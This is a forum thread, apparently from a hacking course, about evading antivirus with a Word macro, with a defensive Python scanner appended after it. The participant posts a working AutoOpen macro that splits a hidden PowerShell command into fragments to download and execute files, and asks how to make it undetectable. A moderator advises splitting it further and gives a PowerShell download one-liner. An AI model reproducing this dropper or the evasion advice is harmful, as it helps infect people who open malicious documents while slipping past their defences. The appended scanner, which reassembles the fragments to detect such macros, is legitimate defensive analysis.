    #43732
    y4gud007
    Participant

    Hi

    I would like to know if there is a way I could generate an undetected generic macro. A minimum of 9 antivirus programs keep detecting the one used by Zaid in the social engineering course, no matter how much tweaking… meanwhile the 2 evil files embedded are 100% clean.

    Sub AutoOpen()
    Dim sk As String
    sk = "p"
    sk = "o"
    sk = sk + "w"
    sk = sk + "er"
    sk = sk + "s"
    sk = sk + "he"
    sk = sk + "ll "
    sk = sk + "-NoP -NonI -W Hidden """
    sk = sk + "('https://blahblah','https://blahblah')"
    sk = sk + "|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);"
    sk = sk + "(new-object System.Net.WebClient).DownloadFile($_,$fileName);"
    sk = sk + "Invoke-Item $fileName;}"
    sk = sk + """"
    VBA.CreateObject("WScript.Shell").Run sk, 0
    End Sub

    #43773
    Diego Pérez
    Moderator

    Hi!
    Basically, bypassing AV programs is like a game of cat and mouse: backdoors might start getting detected at some stage, then the developers release an update, which will allow you to generate undetectable backdoors; then the AV programs release an update which will make the backdoors detectable...

    So you need to keep trying different things; try to split it more.

    Hope it helps!
    Diego

    #43834
    y4gud007
    Participant

    Hi Diego,

    Thanks for your response.
    I understood that we need to play around with backdoors to bypass AV. What I am asking is how to generate a generic VBA command/PowerShell code which I could use in a Microsoft Office macro to allow download and execution of an external .exe file, just like the above generic download-and-execute macro, instead of a payload that requires us to listen back via Empire, Veil, etc. I created my FUD .exe backdoors already; I only need a generic download-and-execute PowerShell/VBA script that would run the code when the macro is enabled. The above generic download-and-execute macro used by Zaid in the course does not bypass AV anymore no matter how much tweaking, which is very normal considering when the lecture was recorded.

    Is there a way I could get this done?

    Thanks

    #43869
    Diego Pérez
    Moderator

    Hi!
    That's the proper way to use PowerShell to download and execute a file. You can try another option, using Invoke-WebRequest, but it also might be flagged by the AV.
    The command would be:
    powershell iwr -uri http://<your address here> -outfile <name of the file>

    Try using it.

    Let me know how it goes!
    Diego
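    The macro in the first post builds its command one fragment at a time so that no single source line contains a keyword a signature would match, and the moderator's advice is to split it further; from the analyst's side that is cheap to undo. The Python below is an added example, not code from the thread: it emulates VBA string concatenation (`=`, `+`, `&`, the `""` escaped quote) over a constructed sample modelled on that macro and reports which indicators appear only once the string is reassembled. The sample macro and the indicator list are assumptions made for the demonstration.

```python
import re
# Constructed sample modelled on the macro in the first post: the command is built
# from fragments so that no single source line contains a recognisable keyword.
SAMPLE_VBA = r'''Sub AutoOpen()
sk = "p"
sk = sk + "ow"
sk = sk + "ershell "
sk = sk + "-NoP -NonI -W Hid"
sk = sk + "den ""$f=$env:temp+'\a.exe';"
sk = sk & "(new-object System.Net.WebClient).Down"
sk = sk + "loadFile($u,$f);"
sk = sk + "Invoke-"
sk = sk + "Item $f"
VBA.CreateObject("WScript.Shell").Run sk, 0
End Sub'''
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# A VBA string literal ("" is the escaped quote), an identifier, or a concatenation operator.
TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|[A-Za-z_]\w*|[+&]')
INDICATORS = ["powershell", "-w hidden", "downloadfile", "invoke-item", "wscript.shell"]

def eval_rhs(rhs, values):
    """Evaluate a right-hand side built only from literals, known variables and +/&; else None."""
    pos, out, expect_operand = 0, "", True
    for tok in TOKEN_RE.finditer(rhs):
        if rhs[pos:tok.start()].strip():
            return None  # unrecognised text between tokens
        t = tok.group(0)
        if expect_operand and t.startswith('"'):
            out += t[1:-1].replace('""', '"')  # undo VBA's doubled quote
        elif expect_operand and t in values:
            out += values[t]
        elif expect_operand or t not in ("+", "&"):
            return None  # function call, unknown name, or misplaced operator
        expect_operand, pos = not expect_operand, tok.end()
    return None if rhs[pos:].strip() or expect_operand else out

def reassemble_strings(vba_source):
    """Emulate the macro's string building; map each variable to its final value."""
    values = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if m and (val := eval_rhs(m.group(2), values)) is not None:
            values[m.group(1)] = val
    return values

def scan(vba_source):
    """Return (indicators found on a single line, indicators only visible after reassembly)."""
    joined = " ".join(reassemble_strings(vba_source).values()).lower()
    visible = [i for i in INDICATORS if any(i in l for l in vba_source.lower().splitlines())]
    return visible, [i for i in INDICATORS if i in joined and i not in visible]
```

    On the sample, only `wscript.shell` is visible line by line; `powershell`, `-w hidden`, `downloadfile` and `invoke-item` surface only after reassembly, which is why a scanner that does not emulate concatenation misses this kind of splitting.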
